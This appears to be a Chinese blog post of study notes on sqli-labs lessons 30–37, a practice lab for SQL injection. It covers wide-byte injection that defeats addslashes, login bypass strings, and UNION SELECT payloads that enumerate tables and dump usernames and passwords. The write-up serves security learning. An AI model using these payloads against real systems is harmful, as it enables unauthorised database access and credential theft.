DAY 6

sqli-labs lesson 30

  • 与上一题一样,需要用到HPP
  • 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

  • 闭合符号为双引号加括号
  • 直接报错型注入

sqli-labs lesson 32(Jsp)

  • 这一题直接用Jsp处理的一个参数即可
  • 闭合符号为单引号与括号,直接报错注入

sqli-labs lesson 32(php)

  • 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
  • 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
  • 其他的直接使用联合查询语句即可

sqli-labs lesson 33

  • addslashes():

    addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)。

  • 和上一题一样

sqli-labs lesson 34

  • 这一关是POST方式
  • 用户名输入:饜’ or 1=1#
  • 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

  • 爆库:?id=99 UNION SELECT 1,database(),3;–+
  • 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
  • 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
  • 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

  • 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
  • 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
  • 其他引号用CHAR()函数绕过

sqli-labs lesson 37

  • 和上一题一样,只不过这次是POST
  • 用户名:㍜’ or 1=1;#

sqli-labs学习笔记 DAY6的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. python学习笔记-Day6(3)

    代码书写原则: 1)不能重复写代码 2)写的代码要经常变更 编程模式概述 面向过程:根据业务逻辑从上到下写垒代码 函数式:将某功能代码封装到函数中,日后便无需重复编写,仅调用函数即可 面向对象:对函数 ...

  3. python学习笔记-Day6(2)

    xml处理模块 xml是实现不同语言或程序之间进行数据交换的协议,跟json差不多,但json使用起来更简单,不过,古时候,在json还没诞生的黑暗年代,大家只能选择用xml呀,至今很多传统公司如金融 ...

  4. python学习笔记-Day6(1)

    shelve模块是一个简单的k,v将内存数据通过文件持久化的模块,可以持久化任何pickle可支持的python数据格式 >>> s=shelve.open('test') > ...

  5. 学习笔记day6:CSS3动画属性

    总结: 1: CSS动画:@keyframes  animation:ie10+:加-webkit前缀: animation 则是属于关键帧动画的范畴; 它本身被用来替代一些纯粹表现的javascri ...

  6. 学习笔记day6:position index结合

    z-index属性适用于定位元素(position 属性值为 relative 或 absolute 或 fixed的对象),用来确定定位元素在垂直于显示屏方向(称为Z轴)上的层叠顺序(stack o ...

  7. JS学习笔记Day6

    一.数组 1.数组就是个容器,里面可以存放任意类型的数 2.定义数组:1)var arr = []: 2)var arr = new Array():构造函数定义方式,如果括号中有一个整数,该正数代表 ...

  8. HTML学习笔记Day6

    一.元素类型 1.元素类型分类依据和元素类型分类 根据css显示分类,XHTML元素被分为三种类型:块状元素.内联元素.行内块元素.可变元素 2.块状元素 1)块状元素在网页中就是以块的形式显示,所谓 ...

  9. Python学习笔记 - day6 - 函数

    函数 函数在编程语言中就是完成特定功能的一个词句组(代码块),这组语句可以作为一个单位使用,并且给它取一个名字.可以通过函数名在程序的不同地方多次执行(这叫函数的调用).函数在编程语言中有基本分为:预 ...

随机推荐

  1. P3558 [POI2013]BAJ-Bytecomputer

    题目描述 A sequence of integers is given. The bytecomputer is a device that allows the following operati ...

  2. ASP.NET MVC编程——路由

    框架自动生成的路由配置 上图中,路由配置文件为App_Start文件夹下的RouteConfig.cs. 代码如下: public class RouteConfig { public static ...

  3. java集合---迭代器iterator

    一:ArraryList  最终继承超级接口Collection,Colection接口继承Iterator接口. public interface Collection<E> exten ...

  4. POJ3268(Dijkstra_邻接矩阵)

    https://vjudge.net/problem/POJ-3268 题目大意: n个农场的n头奶牛将前往x农场,要选择一条来回时间最短的路径. (一头牛的返回路线可能不同于她最初去派对的路线,因为 ...

  5. 愤怒的小鸟【$DP$优化】

    卡常的状压\(DP\),愤怒的小鸟. 其实本来是个很水的状压\(DP\),但因为最后三个点\(n=18\),成功地把我的不可能达到的下界为\(\Omega(2^nn^2)\),紧确的上界为\(O(2^ ...

  6. css学习之LInk & import

    一.用link加载外部样式表 1.放置位置:放在head元素中 2.样式表中只能包含样式规则,不能包含其他标记语言.如出现了标记,会导致其中一部分或全部被忽略. 3.type = 'text/css' ...

  7. OpenGL 球体世界

    一.类似公自转 二.核心代码 //图形渲染 void RenderScene() { //清楚缓存区:颜色缓存区.深度缓存区.模版缓存区 glClear(GL_COLOR_BUFFER_BIT|GL_ ...

  8. Linux下用mail 命令给163邮箱发送邮件!

    linux上的邮件客户端比较多,找一个平时用的比较多mail命令来试试!! 环境 :centos7: 注意 : 服务器必须得有外网才行,qq邮箱作为在linux上的发送端邮箱,经过测试 163 和qq ...

  9. 【转载】WCF 客户端识别认证之UserName认证

    原文地址: http://blog.csdn.net/zxz414644665/article/details/9308055 过程:用户调用service,服务端验证用户传来的用户名和密码(传输过程 ...

  10. Asp调用存储过程,command.CreateParameter 参数值的类型说明

    Asp调用存储过程,command.CreateParameter 参数值的类型说明 Asp调用各种存储过程,包括带参数,无参数,输入输出参数,带返回值等. 1,调用没有参数的存储过程 <% s ...